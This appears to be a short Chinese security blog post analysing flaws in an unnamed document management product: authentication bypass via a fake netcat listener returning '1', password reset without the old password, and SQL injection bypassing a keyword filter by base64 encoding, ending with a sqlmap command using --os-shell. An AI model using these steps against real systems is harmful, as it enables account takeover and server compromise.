某电子文档管理漏洞分析
某电子文档管理漏洞分析
原创 小黑说安全 小黑说安全 2024-09-29 21:31
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,小黑说安全及文章作者不为此承担任何责任。
0x01漏洞分析
1、任意用户登录
让returnValue 1
服务开启nc -lvvp 54335
回复一个1
即可拿到session
拿到JSESSIONID=B63951930136E4CDD4C5ADD6AF3244B5
2、任意密码重置
所以传参要这样传入 key1==value1?key2==value2
这里不用校验旧密码即可新密码。密码必须是md5(明文).upper() md5的大写!
为什么说密码是MD5(明文)大写?
他们所用的库生成就是大写的。
3、SQL注入
参数要求是base64后的传入,这样刚刚好绕过了全局SQL注入的过滤。
waitfor|delay|script|’|exec|insert|select|delete|update|alter|drop|exists|master.|restore|count|%|chr|mid|master|truncate|char|declare|rename|–|or|xp_cmdshell|../..|
py sqlmap.py -r sqli.txt --proxy="http://127.0.0.1:8080" --tamper base64encode.py --force-ssl --os-shell